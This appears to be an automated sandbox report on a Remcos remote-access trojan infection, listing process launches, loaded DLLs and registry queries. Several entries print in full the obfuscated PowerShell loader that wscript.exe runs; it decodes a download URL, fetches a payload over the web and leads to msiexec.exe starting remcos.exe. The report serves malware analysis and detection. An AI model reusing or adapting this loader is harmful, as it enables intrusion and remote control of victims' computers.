(Relationsdatabasemodellen 'Hyp $FestgUsynL 
CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M 
niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL 
CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: edputil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: msi.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: version.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: uxtheme.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textshaping.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: kernel.appcore.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textinputframework.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coreuicomponents.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: ntmarta.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: msi.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: version.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: uxtheme.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textshaping.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: kernel.appcore.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textinputframework.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coreuicomponents.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: ntmarta.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: msi.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: version.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: uxtheme.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textshaping.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: kernel.appcore.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textinputframework.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coreuicomponents.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: ntmarta.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: C:\ProgramData\Remcos\remcos.exe | Automated click: OK
              Source: C:\ProgramData\Remcos\remcos.exe | Automated click: OK
              Source: C:\ProgramData\Remcos\remcos.exe | Automated click: OK
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: msiexec.pdb source: msiexec.exe, msiexec.exe, 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, remcos.exe
